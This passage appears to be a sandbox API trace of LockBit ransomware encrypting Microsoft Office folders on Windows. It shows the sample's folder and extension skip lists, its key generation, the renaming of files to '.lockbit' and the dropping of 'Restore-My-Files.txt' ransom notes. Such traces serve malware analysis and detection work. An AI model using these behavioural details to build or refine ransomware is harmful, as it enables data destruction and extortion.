[0185.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02218_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0185.762] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.762] malloc (_Size=0x40068) returned 0x3df0008 [0185.762] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3012) returned 1 [0185.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.763] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0185.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.763] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0185.764] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.765] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.765] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.766] free (_Block=0x1fa2ed8) [0185.766] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.767] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.767] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02218_.GIF", cAlternateFileName="")) returned 0 [0185.767] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0185.767] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 0 [0185.767] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0185.767] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0185.767] FindClose (in: hFindFile=0x55fdf8 | out: hFindFile=0x55fdf8) returned 1 [0185.767] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Themes 14", cAlternateFileName="DOCUME~1")) returned 1 [0185.767] lstrcmpiW (lpString1=".", lpString2="Document Themes 14") returned -1 [0185.767] lstrcmpiW (lpString1="..", lpString2="Document Themes 14") returned -1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="$windows.~bt") returned 1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="intel") returned -1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="msocache") returned -1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="$recycle.bin") returned 1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="$windows.~ws") returned 1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="tor browser") returned -1 [0185.767] lstrcmpiW (lpString1="Document Themes 14", lpString2="boot") returned 1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="system volume information") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="perflogs") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="google") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="application data") returned 1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="windows") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="windows.old") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="appdata") returned 1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="Windows nt") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="Msbuild") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="Microsoft") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="All users") returned 1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="mozilla") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="Microsoft.NET") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="microsoft shared") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="Internet Explorer") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="common files") returned 1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="opera") returned -1 [0185.768] lstrcmpiW (lpString1="Document Themes 14", lpString2="Windows Journal") returned -1 [0185.768] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 53 [0185.768] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\*") returned 55 [0185.768] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0185.773] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0185.773] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.774] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0185.774] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0185.774] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd0aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.thmx", cAlternateFileName="ADJACE~1.THM")) returned 1 [0185.774] lstrcmpiW (lpString1=".", lpString2="Adjacency.thmx") returned -1 [0185.774] lstrcmpiW (lpString1="..", lpString2="Adjacency.thmx") returned -1 [0185.774] PathFindExtensionW (pszPath="Adjacency.thmx") returned=".thmx" [0185.774] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.774] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.775] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.775] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Adjacency.thmx") returned 1 [0185.776] lstrcmpiW (lpString1="ntldr", lpString2="Adjacency.thmx") returned 1 [0185.776] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Adjacency.thmx") returned 1 [0185.776] lstrcmpiW (lpString1="bootsect.bak", lpString2="Adjacency.thmx") returned 1 [0185.776] lstrcmpiW (lpString1="autorun.inf", lpString2="Adjacency.thmx") returned 1 [0185.776] lstrcmpiW (lpString1="thumbs.db", lpString2="Adjacency.thmx") returned 1 [0185.776] lstrcmpiW (lpString1="iconcache.db", lpString2="Adjacency.thmx") returned 1 [0185.776] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.776] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx") returned=".thmx" [0185.776] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.776] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.776] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.777] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.777] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.lockbit") returned 76 [0185.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\adjacency.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0185.779] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.779] malloc (_Size=0x40068) returned 0x3df0008 [0185.779] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=53418) returned 1 [0185.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0185.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0185.781] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.783] malloc (_Size=0xae) returned 0x1fa2ed8 [0185.783] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0185.784] free (_Block=0x1fa2ed8) [0185.784] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.784] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.784] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0185.790] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.790] malloc (_Size=0x40068) returned 0x3d70450 [0185.790] WriteFile (in: hFile=0x330, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0185.791] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f9d200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x62f9d200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x11098, dwReserved0=0x0, dwReserved1=0x0, cFileName="Angles.thmx", cAlternateFileName="ANGLES~1.THM")) returned 1 [0185.791] lstrcmpiW (lpString1=".", lpString2="Angles.thmx") returned -1 [0185.791] lstrcmpiW (lpString1="..", lpString2="Angles.thmx") returned -1 [0185.791] PathFindExtensionW (pszPath="Angles.thmx") returned=".thmx" [0185.791] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.791] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.792] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.793] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.793] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Angles.thmx") returned 1 [0185.794] lstrcmpiW (lpString1="ntldr", lpString2="Angles.thmx") returned 1 [0185.794] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Angles.thmx") returned 1 [0185.794] lstrcmpiW (lpString1="bootsect.bak", lpString2="Angles.thmx") returned 1 [0185.794] lstrcmpiW (lpString1="autorun.inf", lpString2="Angles.thmx") returned 1 [0185.794] lstrcmpiW (lpString1="thumbs.db", lpString2="Angles.thmx") returned 1 [0185.794] lstrcmpiW (lpString1="iconcache.db", lpString2="Angles.thmx") returned 1 [0185.794] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.794] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx") returned=".thmx" [0185.794] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.794] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.794] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.795] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.795] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.lockbit") returned 73 [0185.795] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" 